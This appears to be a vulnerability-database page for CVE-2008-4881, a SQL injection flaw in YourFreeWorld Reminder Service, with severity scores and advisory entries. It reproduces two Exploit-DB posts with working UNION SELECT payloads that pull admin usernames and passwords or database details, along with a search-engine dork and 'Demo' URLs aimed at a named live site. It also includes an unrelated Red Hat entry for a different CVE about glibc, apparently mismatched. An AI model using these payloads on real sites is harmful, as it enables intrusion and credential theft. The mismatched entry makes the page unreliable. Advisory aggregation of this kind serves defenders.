CVE-2008-4881
Published 2008-11-04
CVE-2008-4881: SQL injection vulnerability in tr.php in YourFreeWorld Reminder Service Script allows remote attackers to execute arbitrary SQL commands via the id parameter.
Priority P340 · high · 7.5 · CVSS 2.0
AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS 0.98% (57.8th percentile)
CVSS provenance
nvd · v2.0 · 7.5 · HIGH · AV:N/AC:L/Au:N/C:P/I:P/A:P
vendor_redhat · 7.5 · HIGH
GHSA
GHSA-rc7c-6m74-6jwx: SQL injection vulnerability in tr
ghsa_unreviewed·2022-05-17
CVE-2008-4881 [HIGH] CWE-89 GHSA-rc7c-6m74-6jwx: SQL injection vulnerability in tr
SQL injection vulnerability in tr.php in YourFreeWorld Reminder Service Script allows remote attackers to execute arbitrary SQL commands via the id parameter.
Red Hat
(32-bit): Integer overflow in the __vstrfmon_l function
vendor_redhat·2008-03-25·CVSS 7.5
CVE-2009-4881 [HIGH] CWE-190 (32-bit): Integer overflow in the __vstrfmon_l function
Integer overflow in the __vstrfmon_l function in stdlib/strfmon_l.c in the strfmon implementation in the GNU C Library (aka glibc or libc6) before 2.10.1 allows context-dependent attackers to cause a denial of service (application crash) via a crafted format string, as demonstrated by the %99999999999999999999n string, a related issue to CVE-2008-1391.
Statement: Red Hat does not consider this bug to be a security issue. A properly written application should not use arbitrary untrusted data as part of the format string passed to functions such as strfmon or the printf family of functions.
No detection rules found.
Exploit-DB
YourFreeWorld Reminder Service - SQL Injection
exploitdb·2008-11-01
CVE-2008-4881 YourFreeWorld Reminder Service - SQL Injection
---
Reminder Service ( id ) Remote SQL Injection Vulnerability
Author: Hussin X
Home : www.IQ-TY.com & www.TrYaG.cc
script : http://www.yourfreeworld.com/script/reminder.php
DorK : inurl:tr.php?id= Reminder Service
Exploit :
tr.php?id=-1+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11,12,13+from+adminsettings--
Demo :
http://www.downlinegoldmine.com/reminderservice/tr.php?id=-1+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11,12,13+from+adminsettings--
Greetz : All my friends
# milw0rm.com [2008-11-01]
Exploit-DB
YourFreeWorld Banner Management - SQL Injection
exploitdb·2008-11-01
CVE-2008-4900 YourFreeWorld Banner Management - SQL Injection
---
Banner Management (id) Remote SQL Injection Vulnerability
Author: Hussin X
Home : www.IQ-TY.com & www.TrYaG.cc
script : http://www.yourfreeworld.com/script/bannermanagementscript.asp
DorK : :)
Exploit :
tr.php?id=-1+union+select+1,2,3,concat(user(),version(),database()),5,6,7,8,9,10,11,12,13--
Demo :
http://www.downlinegoldmine.com/bannermanagerpro/tr.php?id=-1+union+select+1,2,3,concat(user(),version(),database()),5,6,7,8,9,10,11,12,13--
Greetz : All my friends
# milw0rm.com [2008-11-01]